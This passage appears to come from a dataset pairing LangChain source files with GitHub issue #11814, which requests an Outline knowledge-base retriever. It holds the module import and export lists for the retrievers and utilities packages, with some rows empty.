from langchain.retrievers.parent_document_retriever import ParentDocumentRetriever
from langchain.retrievers.pinecone_hybrid_search import PineconeHybridSearchRetriever
from langchain.retrievers.pubmed import PubMedRetriever
from langchain.retrievers.re_phraser import RePhraseQueryRetriever
from langchain.retrievers.remote_retriever import RemoteLangChainRetriever
from langchain.retrievers.self_query.base import SelfQueryRetriever
from langchain.retrievers.svm import SVMRetriever
from langchain.retrievers.tavily_search_api import TavilySearchAPIRetriever
from langchain.retrievers.tfidf import TFIDFRetriever
from langchain.retrievers.time_weighted_retriever import (
TimeWeightedVectorStoreRetriever,
)
from langchain.retrievers.vespa_retriever import VespaRetriever
from langchain.retrievers.weaviate_hybrid_search import WeaviateHybridSearchRetriever
from langchain.retrievers.web_research import WebResearchRetriever
from langchain.retrievers.wikipedia import WikipediaRetriever
from langchain.retrievers.zep import ZepRetriever
from langchain.retrievers.zilliz import ZillizRetriever
__all__ = [
"AmazonKendraRetriever",
"ArceeRetriever",
"ArxivRetriever",
"AzureCognitiveSearchRetriever",
"ChatGPTPluginRetriever",
"ContextualCompressionRetriever",
"ChaindeskRetriever",
"CohereRagRetriever",
"ElasticSearchBM25Retriever",
"EmbedchainRetriever",
"GoogleDocumentAIWarehouseRetriever",
"GoogleCloudEnterpriseSearchRetriever",
"GoogleVertexAIMultiTurnSearchRetriever",
"GoogleVertexAISearchRetriever",
"KayAiRetriever",
"KNNRetriever",
"LlamaIndexGraphRetriever",
"LlamaIndexRetriever",
"MergerRetriever",
"MetalRetriever",
"MilvusRetriever",
"MultiQueryRetriever",
"PineconeHybridSearchRetriever",
"PubMedRetriever",
"RemoteLangChainRetriever",
"SVMRetriever",
"SelfQueryRetriever",
"TavilySearchAPIRetriever",
"TFIDFRetriever",
"BM25Retriever",
"TimeWeightedVectorStoreRetriever",
"VespaRetriever",
"WeaviateHybridSearchRetriever",
"WikipediaRetriever",
"ZepRetriever",
"ZillizRetriever",
"DocArrayRetriever",
"RePhraseQueryRetriever",
"WebResearchRetriever",
"EnsembleRetriever",
"ParentDocumentRetriever",
"MultiVectorRetriever",
]
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,814 | Create retriever for Outline to ask questions on knowledge base | ### Feature request
A retriever for documents from [Outline](https://github.com/outline/outline).
The API has a search endpoint which allows this to be possible: https://www.getoutline.com/developers#tag/Documents/paths/~1documents.search/post
The implementation will be similar to the Wikipedia retriever:
https://python.langchain.com/docs/integrations/retrievers/wikipedia
### Motivation
Outline is an open source project that let's you create a knowledge base, like a wiki. Creating a retriever for Outline will let your team interact with your knowledge base using an LLM.
### Your contribution
PR will be coming soon. | https://github.com/langchain-ai/langchain/issues/11814 | https://github.com/langchain-ai/langchain/pull/13889 | f2af82058f4904b20ae95c6d17d2b65666bf882a | 935f78c9449c40473541666a8b0a0dc61873b0eb | "2023-10-15T01:58:24Z" | python | "2023-11-27T02:56:12Z" | libs/langchain/langchain/retrievers/outline.py | |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,814 | Create retriever for Outline to ask questions on knowledge base | ### Feature request
A retriever for documents from [Outline](https://github.com/outline/outline).
The API has a search endpoint which allows this to be possible: https://www.getoutline.com/developers#tag/Documents/paths/~1documents.search/post
The implementation will be similar to the Wikipedia retriever:
https://python.langchain.com/docs/integrations/retrievers/wikipedia
### Motivation
Outline is an open source project that let's you create a knowledge base, like a wiki. Creating a retriever for Outline will let your team interact with your knowledge base using an LLM.
### Your contribution
PR will be coming soon. | https://github.com/langchain-ai/langchain/issues/11814 | https://github.com/langchain-ai/langchain/pull/13889 | f2af82058f4904b20ae95c6d17d2b65666bf882a | 935f78c9449c40473541666a8b0a0dc61873b0eb | "2023-10-15T01:58:24Z" | python | "2023-11-27T02:56:12Z" | libs/langchain/langchain/utilities/__init__.py | """**Utilities** are the integrations with third-part systems and packages.
Other LangChain classes use **Utilities** to interact with third-part systems
and packages.
"""
from typing import Any
from langchain.utilities.requests import Requests, RequestsWrapper, TextRequestsWrapper
def _import_alpha_vantage() -> Any:
from langchain.utilities.alpha_vantage import AlphaVantageAPIWrapper
return AlphaVantageAPIWrapper
def _import_apify() -> Any:
from langchain.utilities.apify import ApifyWrapper
return ApifyWrapper
def _import_arcee() -> Any:
from langchain.utilities.arcee import ArceeWrapper
return ArceeWrapper
def _import_arxiv() -> Any:
from langchain.utilities.arxiv import ArxivAPIWrapper
return ArxivAPIWrapper
def _import_awslambda() -> Any:
from langchain.utilities.awslambda import LambdaWrapper
return LambdaWrapper
def _import_bibtex() -> Any:
from langchain.utilities.bibtex import BibtexparserWrapper
return BibtexparserWrapper
def _import_bing_search() -> Any:
from langchain.utilities.bing_search import BingSearchAPIWrapper
return BingSearchAPIWrapper
def _import_brave_search() -> Any:
from langchain.utilities.brave_search import BraveSearchWrapper
return BraveSearchWrapper
def _import_duckduckgo_search() -> Any:
from langchain.utilities.duckduckgo_search import DuckDuckGoSearchAPIWrapper
return DuckDuckGoSearchAPIWrapper
def _import_golden_query() -> Any:
from langchain.utilities.golden_query import GoldenQueryAPIWrapper
return GoldenQueryAPIWrapper
def _import_google_places_api() -> Any:
from langchain.utilities.google_places_api import GooglePlacesAPIWrapper
return GooglePlacesAPIWrapper
def _import_google_scholar() -> Any:
from langchain.utilities.google_scholar import GoogleScholarAPIWrapper
return GoogleScholarAPIWrapper
def _import_google_search() -> Any:
from langchain.utilities.google_search import GoogleSearchAPIWrapper
return GoogleSearchAPIWrapper
def _import_google_serper() -> Any:
from langchain.utilities.google_serper import GoogleSerperAPIWrapper
return GoogleSerperAPIWrapper
def _import_graphql() -> Any:
from langchain.utilities.graphql import GraphQLAPIWrapper
return GraphQLAPIWrapper
def _import_jira() -> Any:
from langchain.utilities.jira import JiraAPIWrapper
return JiraAPIWrapper
def _import_max_compute() -> Any:
from langchain.utilities.max_compute import MaxComputeAPIWrapper
return MaxComputeAPIWrapper
def _import_metaphor_search() -> Any:
from langchain.utilities.metaphor_search import MetaphorSearchAPIWrapper
return MetaphorSearchAPIWrapper
def _import_openweathermap() -> Any:
from langchain.utilities.openweathermap import OpenWeatherMapAPIWrapper
return OpenWeatherMapAPIWrapper
def _import_portkey() -> Any:
from langchain.utilities.portkey import Portkey
return Portkey
def _import_powerbi() -> Any:
from langchain.utilities.powerbi import PowerBIDataset
return PowerBIDataset
def _import_pubmed() -> Any:
from langchain.utilities.pubmed import PubMedAPIWrapper
return PubMedAPIWrapper
def _import_python() -> Any:
from langchain.utilities.python import PythonREPL
return PythonREPL
def _import_scenexplain() -> Any:
from langchain.utilities.scenexplain import SceneXplainAPIWrapper
return SceneXplainAPIWrapper
def _import_searchapi() -> Any:
from langchain.utilities.searchapi import SearchApiAPIWrapper
return SearchApiAPIWrapper
def _import_searx_search() -> Any:
from langchain.utilities.searx_search import SearxSearchWrapper
return SearxSearchWrapper
def _import_serpapi() -> Any:
from langchain.utilities.serpapi import SerpAPIWrapper
return SerpAPIWrapper
def _import_spark_sql() -> Any:
from langchain.utilities.spark_sql import SparkSQL
return SparkSQL
def _import_sql_database() -> Any:
from langchain.utilities.sql_database import SQLDatabase
return SQLDatabase
def _import_tensorflow_datasets() -> Any:
from langchain.utilities.tensorflow_datasets import TensorflowDatasets
return TensorflowDatasets
def _import_twilio() -> Any:
from langchain.utilities.twilio import TwilioAPIWrapper
return TwilioAPIWrapper
def _import_wikipedia() -> Any:
from langchain.utilities.wikipedia import WikipediaAPIWrapper
return WikipediaAPIWrapper
def _import_wolfram_alpha() -> Any:
from langchain.utilities.wolfram_alpha import WolframAlphaAPIWrapper
return WolframAlphaAPIWrapper
def _import_zapier() -> Any:
from langchain.utilities.zapier import ZapierNLAWrapper
return ZapierNLAWrapper
def __getattr__(name: str) -> Any:
if name == "AlphaVantageAPIWrapper":
return _import_alpha_vantage()
elif name == "ApifyWrapper":
return _import_apify()
elif name == "ArceeWrapper":
return _import_arcee()
elif name == "ArxivAPIWrapper":
return _import_arxiv()
elif name == "LambdaWrapper":
return _import_awslambda()
elif name == "BibtexparserWrapper":
return _import_bibtex()
elif name == "BingSearchAPIWrapper":
return _import_bing_search()
elif name == "BraveSearchWrapper":
return _import_brave_search()
elif name == "DuckDuckGoSearchAPIWrapper":
return _import_duckduckgo_search()
elif name == "GoldenQueryAPIWrapper":
return _import_golden_query()
elif name == "GoogleScholarAPIWrapper":
return _import_google_scholar()
elif name == "GooglePlacesAPIWrapper":
return _import_google_places_api()
elif name == "GoogleSearchAPIWrapper":
return _import_google_search()
elif name == "GoogleSerperAPIWrapper":
return _import_google_serper()
elif name == "GraphQLAPIWrapper":
return _import_graphql()
elif name == "JiraAPIWrapper":
return _import_jira()
elif name == "MaxComputeAPIWrapper":
return _import_max_compute()
elif name == "MetaphorSearchAPIWrapper":
return _import_metaphor_search()
elif name == "OpenWeatherMapAPIWrapper":
return _import_openweathermap()
elif name == "Portkey":
return _import_portkey()
elif name == "PowerBIDataset":
return _import_powerbi()
elif name == "PubMedAPIWrapper":
return _import_pubmed()
elif name == "PythonREPL":
return _import_python()
elif name == "SceneXplainAPIWrapper":
return _import_scenexplain()
elif name == "SearchApiAPIWrapper":
return _import_searchapi()
elif name == "SearxSearchWrapper":
return _import_searx_search()
elif name == "SerpAPIWrapper":
return _import_serpapi()
elif name == "SparkSQL":
return _import_spark_sql()
elif name == "SQLDatabase":
return _import_sql_database()
elif name == "TensorflowDatasets":
return _import_tensorflow_datasets()
elif name == "TwilioAPIWrapper":
return _import_twilio()
elif name == "WikipediaAPIWrapper":
return _import_wikipedia()
elif name == "WolframAlphaAPIWrapper":
return _import_wolfram_alpha()
elif name == "ZapierNLAWrapper":
return _import_zapier()
else:
raise AttributeError(f"Could not find: {name}")
__all__ = [
"AlphaVantageAPIWrapper",
"ApifyWrapper",
"ArceeWrapper",
"ArxivAPIWrapper",
"BibtexparserWrapper",
"BingSearchAPIWrapper",
"BraveSearchWrapper",
"DuckDuckGoSearchAPIWrapper",
"GoldenQueryAPIWrapper",
"GooglePlacesAPIWrapper",
"GoogleScholarAPIWrapper",
"GoogleSearchAPIWrapper",
"GoogleSerperAPIWrapper",
"GraphQLAPIWrapper",
"JiraAPIWrapper",
"LambdaWrapper",
"MaxComputeAPIWrapper",
"MetaphorSearchAPIWrapper",
"OpenWeatherMapAPIWrapper",
"Portkey",
"PowerBIDataset",
"PubMedAPIWrapper",
"PythonREPL",
"Requests",
"RequestsWrapper",
"SQLDatabase",
"SceneXplainAPIWrapper",
"SearchApiAPIWrapper",
"SearxSearchWrapper",
"SerpAPIWrapper",
"SparkSQL",
"TensorflowDatasets",
"TextRequestsWrapper",
"TwilioAPIWrapper",
"WikipediaAPIWrapper",
"WolframAlphaAPIWrapper",
"ZapierNLAWrapper",
]
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,814 | Create retriever for Outline to ask questions on knowledge base | ### Feature request
A retriever for documents from [Outline](https://github.com/outline/outline).
The API has a search endpoint which allows this to be possible: https://www.getoutline.com/developers#tag/Documents/paths/~1documents.search/post
The implementation will be similar to the Wikipedia retriever:
https://python.langchain.com/docs/integrations/retrievers/wikipedia
### Motivation
Outline is an open source project that let's you create a knowledge base, like a wiki. Creating a retriever for Outline will let your team interact with your knowledge base using an LLM.
### Your contribution
PR will be coming soon. | https://github.com/langchain-ai/langchain/issues/11814 | https://github.com/langchain-ai/langchain/pull/13889 | f2af82058f4904b20ae95c6d17d2b65666bf882a | 935f78c9449c40473541666a8b0a0dc61873b0eb | "2023-10-15T01:58:24Z" | python | "2023-11-27T02:56:12Z" | libs/langchain/langchain/utilities/outline.py |